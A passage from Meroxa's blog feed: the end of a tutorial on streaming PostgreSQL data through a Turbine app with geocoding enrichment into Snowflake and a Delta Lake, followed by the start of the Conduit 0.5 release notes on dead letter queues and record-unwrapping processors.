&lt;tr&gt;
&lt;td&gt;AWS_SECRET_ACCESS_KEY&lt;/td&gt;
&lt;td&gt;AWS Secret for user accessing buckets&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AWS_REGION&lt;/td&gt;
&lt;td&gt;Region the bucket was created in&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AWS_URI&lt;/td&gt;
&lt;td&gt;The URI of the bucket (e.g. s3://bucket-name/key-name)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SENTRY_DSN&lt;/td&gt;
&lt;td&gt;Sentry Data Source Name (DSN) to upload logs and errors&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GOOGLE_API_KEY&lt;/td&gt;
&lt;td&gt;API Key to access Google Location API&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;We will address each one of these variables as we walk through our example.&lt;/p&gt;
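&lt;p&gt;For example, a small stdlib-only sketch (the helper name is ours, not part of Turbine) that fails fast if any of the variables in the table above are missing:&lt;/p&gt;

```python
import os

# Variable names taken from the table above.
REQUIRED_VARS = [
    "AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_REGION",
    "AWS_URI", "SENTRY_DSN", "GOOGLE_API_KEY",
]

def load_settings(environ=os.environ):
    """Return the required settings, raising if any are unset or empty."""
    missing = [name for name in REQUIRED_VARS if not environ.get(name)]
    if missing:
        raise RuntimeError("missing environment variables: " + ", ".join(missing))
    return {name: environ[name] for name in REQUIRED_VARS}
```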
&lt;h3&gt;Writing our Turbine App&lt;/h3&gt;
&lt;p&gt;Our Turbine application has three main tasks: read raw data from our Bronze data source, transform it for our Silver intermediate data store, and ultimately write to our Delta Table in our Gold destination.&lt;br&gt;
To start, we first need to retrieve our raw data. Turbine enables us to stream rows, referred to as Records in Turbine, from our Bronze database, in this case the “employees” table in a PostgreSQL database.&lt;img src=&quot;https://lh3.googleusercontent.com/-OoL9ZgLvlxpYd5P049ayZnIe_V3DtrSyVFtFaRBptxS-385wopUk07zdJLmutP9gmoy4q8wEws4QyjZ1PH-XIrUNEBfI7XHxXcYxHHf7-xGbwBEkwcds769oO1jDbsqvFEnq1oa6M9ghZScbtK1gL4&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;p&gt;Taking a quick look at our raw data, we can see that Turbine has formatted it as JSON.&lt;br&gt;
&lt;img src=&quot;https://lh4.googleusercontent.com/1Qb_HGhgsHt59-fiOWokVR-Md7nYewuRH4xtUFekFPJML3I-ietRLOoG4lL90D0oKR0PDZm98RefFEYmmhvnMeaZZXbX8mwOVZwDSBhP3PlDGOztidGSVreYn8Cp9l6-05p5YDBm5AmjAq6qRC80BBE&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;p&gt;With our raw data in hand, our next step is to enrich it. For this example we want to translate the postcode on each record to latitude and longitude using the &lt;a href=&quot;https://developers.google.com/maps/documentation/address-validation&quot;&gt;Google Address Validation API&lt;/a&gt;. This can be accomplished by using the Requests library to make a request against the Address Validation API and obtain our enhancement.&lt;/p&gt;
&lt;p&gt;Notice that nothing in this code is specific to Turbine; it can be run on its own, as is.&lt;br&gt;
&lt;img src=&quot;https://lh6.googleusercontent.com/S-AAJrY75hkwKfvXVUM6_i5zZej_mh_O-vh_J5p7rDZKbD78I_46jviAbR98rqudQl6V5vXQqJYo-9gDhhupGh1eXAi77SFHtNcstKLv1Mu6NC19jI6k-ExGgw_SZSbT9xmxtJ710av-OakLbHPtQNI&quot; alt=&quot;Code snippet&quot;&gt;&lt;br&gt;
Another great feature of Turbine is that it allows us to abstract out any logic we want into a separate module so we can keep our code neat and organized. Here we have chosen to move our enrichment logic into a module called enrich.py&lt;/p&gt;
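&lt;p&gt;A minimal sketch of what such enrichment logic might look like, using only the standard library (the post itself uses Requests; the endpoint and response shape shown here follow Google’s Address Validation documentation, but treat them as assumptions):&lt;/p&gt;

```python
import json
import os
from urllib import request

def extract_latlng(response):
    """Pull latitude/longitude out of an Address Validation response.

    Assumed shape: result.geocode.location.{latitude, longitude}.
    """
    location = response["result"]["geocode"]["location"]
    return location["latitude"], location["longitude"]

def lookup_latlng(postcode, api_key=None):
    """Translate a postcode to (lat, lng) via the Address Validation API."""
    api_key = api_key or os.environ["GOOGLE_API_KEY"]
    url = ("https://addressvalidation.googleapis.com/v1:validateAddress?key="
           + api_key)
    body = json.dumps({"address": {"postalCode": postcode}}).encode()
    req = request.Request(url, data=body,
                          headers={"Content-Type": "application/json"})
    with request.urlopen(req) as resp:
        return extract_latlng(json.load(resp))
```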
&lt;p&gt;We extract the postcode from each &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/python#records-and-events&quot;&gt;Record&lt;/a&gt;, a JSON representation of each row in our Bronze database, and enrich it using our previously created logic. Once we’ve set up our processing logic we can use Turbine to execute our logic and write to our Silver database in only three lines of code. &lt;img src=&quot;https://lh4.googleusercontent.com/8fZm9JZdeSPQrRzdfgd_9dhXEWp5UY19HLhQypR63ku0gWsSCen4O8boMq61MKAi70oZ6Ptrj0KNym113sMYl0GwU9rEqlIbd5PE96l9P3IT6nFSmvFRrpS_9XZ6Ko5M62m5e_a5fKsZ3G-eJuNlJ58&quot; alt=&quot;Code snippet&quot;&gt;&lt;br&gt;
But we still need to write to our Gold database; our Delta Lake. Here we are using &lt;a href=&quot;https://github.com/delta-io/delta-rs&quot;&gt;delta-rs&lt;/a&gt;, a Rust library with Python bindings, to initialize and write to our Delta Lake. Like our enrichment logic from before, this logic contains nothing Turbine specific and can be run on its own. In addition to our Delta writing logic we also use the &lt;a href=&quot;https://docs.sentry.io/platforms/python/&quot;&gt;Sentry SDK&lt;/a&gt; to log any errors we may encounter.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/mF75kldBYYN7e0VHUTNzObqW9uNsFbL4p_AmbJyiSYLwlKQtVxTjY_4BpMRcEIt7Upvst9PmAnd58647Vgc9UppkaUIkeMgiDyDMJt-Mubx2Aa1erdB8ZJ0Q0ZBpzVu3AlIkuQlx5Kmj2R2YjJK1xyE&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Putting It All Together&lt;/h3&gt;
&lt;p&gt;All that’s left now is to piece it all together in our `main.py` module. Here we see how the Turbine framework helps us connect our source, enrichment logic, and finally our destinations together.&lt;img src=&quot;https://lh3.googleusercontent.com/NwN5HQ4t4h5nPfFUR10CcBEBojXSFUj0RqHpw48nkYlfIEAvgJKPZhcSXgdxZlf7Nvtr1ajAFToT2-HWO5wilkGhOrzPAKA1Io5drMAyWfezawMipaBRtjCQDre8FqsYzC7poJNUEwyEcxI8qAbgpDU&quot; alt=&quot;Code snippet&quot;&gt; Remember the bonus logging we mentioned before? In our complete Turbine application we’ve added an invocation of the sentry_sdk initialization function. Although Turbine handles execution of your code for you, you are more than welcome to bring your own logging tools for that extra bit of insight into how your code is performing.&lt;/p&gt;
&lt;h3&gt;Deploying our Application&lt;/h3&gt;
&lt;p&gt;Now let&apos;s get our application up and running. Using git and the Meroxa CLI we will run the following commands:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; commit &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Initial Commit&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps deploy&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;💡 For more information on deployment, you can refer to the Meroxa Docs &lt;a href=&quot;https://docs.meroxa.com/turbine/deployment&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;While we wait, the Meroxa Platform is hard at work wiring all of our resources together; connecting our Bronze source to our function and our function to our Silver and Gold destinations.&lt;/p&gt;
&lt;p&gt;Once our application is deployed we will see that every record that is already in our Bronze source will be written to our Gold and Silver destinations with our updates in hand. The running Turbine application will continue to process all new records as they are written to our Bronze source.&lt;/p&gt;
&lt;p&gt;Meroxa sets up the complex connections and polling logic and lets us focus on the real fun part; writing code.&lt;/p&gt;
&lt;h2&gt;Final Thoughts&lt;/h2&gt;
&lt;p&gt;The Medallion Architecture and the Delta Lake framework combine to be an incredibly powerful way to organize and augment our data. However, a lot of time and effort is often spent on setting up the infrastructure we need to even begin to make use of this powerful combination.&lt;/p&gt;
&lt;p&gt;With Meroxa and Turbine we no longer need to concern ourselves with this complex overhead and instead we can focus on the logic that does the heavy lifting.
We’ve seen that with Meroxa and Turbine we are able to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Stream raw, unfiltered data from our Bronze PostgreSQL data source&lt;/li&gt;
&lt;li&gt;Augment our data using whatever logic we want and any libraries or APIs we may need&lt;/li&gt;
&lt;li&gt;Intermediately warehouse our augmented data in a Snowflake database&lt;/li&gt;
&lt;li&gt;Ultimately write our data into an AWS S3 backed Delta Table, ready to be consumed&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And we did it all without having to set up any extra infrastructure or streaming logic.&lt;/p&gt;
&lt;p&gt;If you&apos;re interested in learning more about Meroxa, be sure to check out our documentation and Discord community. We support a wide range of source and destination resources, and you can use languages you already know to ingest, orchestrate, transform, and stream data to and from anywhere.&lt;/p&gt;
&lt;p&gt;Thanks for reading, and we hope this post was helpful in your data-driven journey!&lt;/p&gt;
&lt;p&gt;Here are some additional examples of what can be accomplished with Meroxa:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://meroxa.com/blog/using-turbine-to-call-multiple-apis-in-real-time-to-transform-enrich-your-data&quot;&gt;Using Turbine to Call Multiple APIs in Real-Time to Transform &amp;#x26; Enrich Data&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;/streaming-changes-in-real-time-from-mongodb-to-apache-kafka&quot;&gt;Streaming Changes in Real-Time from MongoDB to Apache Kafka&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;/sync-transform-migrate-data-in-real-time-from-postgresql-to-mongodb-w/-meroxa&quot;&gt;Sync Transform Migrate Data in Real-Time from PostgreSQL to MongoDB with Meroxa&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Conduit 0.5 is Now Available]]></title><description><![CDATA[Conduit 0.5: We made an easy-to-configure Dead Letter Queues (DLQ) through HTTP & gRPC, extending health checking, & adding capabilities with Debezium records.]]></description><link>https://meroxa.com/blog/conduit-0.5</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-0.5</guid><dc:creator><![CDATA[Uchenna Anyanwu]]></dc:creator><pubDate>Tue, 28 Feb 2023 21:18:23 GMT</pubDate><content:encoded>&lt;p&gt;Conduit 0.5 is out! Conduit’s a tool to help developers build streaming data pipelines between production data stores and messaging systems. For example, if you’ve ever used tools like Kafka Connect, Conduit can be used as a drop-in replacement to help stream data to Apache Kafka. With this release, the goal was to make Conduit easier to operate as a service. This meant, making an easy-to-configure Dead Letter Queues (DLQ) through HTTP and gRPC, extending health checking, and adding more capabilities with Debezium records. Here’s a look at some of the key enhancements in Conduit &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.5.0&quot;&gt;0.5.0&lt;/a&gt; and Conduit &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.5.1&quot;&gt;0.5.1&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Stream Inspector&lt;/h2&gt;
&lt;p&gt;In the Conduit 0.4 &lt;a href=&quot;https://meroxa.com/blog/conduit-0.4&quot;&gt;release&lt;/a&gt;, developers could peek at data as it enters Conduit via source connectors and see what it looks like as it travels to destination connectors. In this release, we have made the stream inspector more complete: by adding methods to the processor interface and new endpoints, you can now also peek at data as it enters or leaves processors.&lt;/p&gt;
&lt;p&gt;Processor inspection is available &lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/processors.md#inspecting-a-processor&quot;&gt;via the API&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Dead Letter Queues&lt;/h2&gt;
&lt;p&gt;In Conduit 0.4 we added &lt;a href=&quot;https://en.wikipedia.org/wiki/Dead_letter_queue&quot;&gt;Dead Letter Queues&lt;/a&gt; (DLQs) that can be configured through pipeline configuration files. In 0.5 we extended this feature by exposing the DLQ configuration through the HTTP and gRPC APIs. Additionally, we added two new metrics that help you keep an eye on the behavior of your DLQ: `conduit_dlq_execution_duration_seconds` is a histogram tracking how long it took to insert records into the DLQ, and `conduit_dlq_bytes` gives you insight into the size of the records sent to the DLQ.&lt;/p&gt;
&lt;p&gt;Check out more information about Dead Letter Queues in our &lt;a href=&quot;https://conduit.io/docs/features/dead-letter-queue&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Unwrap a Debezium record into an OpenCDC record&lt;/h2&gt;
&lt;p&gt;Two main processors were added to Conduit in this release:&lt;/p&gt;
&lt;p&gt;1.) Parse JSON Processor: some source connectors create a record whose key, payload, or both contain raw data (an array of bytes that is not human-readable). If we know that these values are JSON-formatted, this processor can convert the raw data values into structured data (a map of strings to values).&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;To parse the key, use the `parsejsonkey` processor name.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;To parse the payload, use the `parsejsonpayload` processor name.&lt;/p&gt;
&lt;p&gt;Ex: using the `parsejsonkey` processor, the key can go from looking like this:&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;RawData &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    Raw&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;uint8&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token number&quot;&gt;0x7b&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x22&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x61&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x66&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x74&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x65&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x72&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x22&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x3a&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x7b&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x22&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x61&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x74&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x61&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x22&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token number&quot;&gt;0x3a&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x34&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x2c&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x22&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x69&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x22&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x3a&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x33&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x7d&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x7d&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To This:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;StructuredData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;after&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token string&quot;&gt;&quot;data&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
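&lt;p&gt;In Python terms (illustrative, not Conduit code), the raw key above is just the UTF-8 bytes of a JSON document, and parsing it yields the structured form:&lt;/p&gt;

```python
import json

# The same byte values as in the Go example above.
raw_key = bytes([0x7b, 0x22, 0x61, 0x66, 0x74, 0x65, 0x72, 0x22, 0x3a,
                 0x7b, 0x22, 0x64, 0x61, 0x74, 0x61, 0x22, 0x3a, 0x34,
                 0x2c, 0x22, 0x69, 0x64, 0x22, 0x3a, 0x33, 0x7d, 0x7d])

print(raw_key.decode())           # → {"after":{"data":4,"id":3}}
structured = json.loads(raw_key)  # what the parsejsonkey processor produces
print(structured["after"]["id"])  # → 3
```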
&lt;p&gt;2.) Unwrap Processor: source connectors can create a record with another record wrapped inside the payload, so we provided a processor that unwraps the record from the payload and creates a new &lt;a href=&quot;https://meroxa.com/blog/a-proposal-for-better-interoperability-with-change-data-capture&quot;&gt;OpenCDC&lt;/a&gt; record from it. This processor can unwrap two formats:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Debezium: if the payload is a Debezium record, create a processor with the name “unwrap” and add the configuration “format:debezium”. For example, the record can go from looking like (1) to (2)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;(1)&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    Metadata&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;conduit.version&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;v0.4.0&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Payload&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Change&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        Before&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        After&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;StructuredData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;token string&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;token string&quot;&gt;&quot;after&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                    &lt;span class=&quot;token string&quot;&gt;&quot;description&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;test1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                    &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;27&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string&quot;&gt;&quot;before&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string&quot;&gt;&quot;op&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;u&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string&quot;&gt;&quot;source&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                    &lt;span class=&quot;token string&quot;&gt;&quot;opencdc.version&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;v1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string&quot;&gt;&quot;transaction&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string&quot;&gt;&quot;ts_ms&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;float64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1674061777225&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
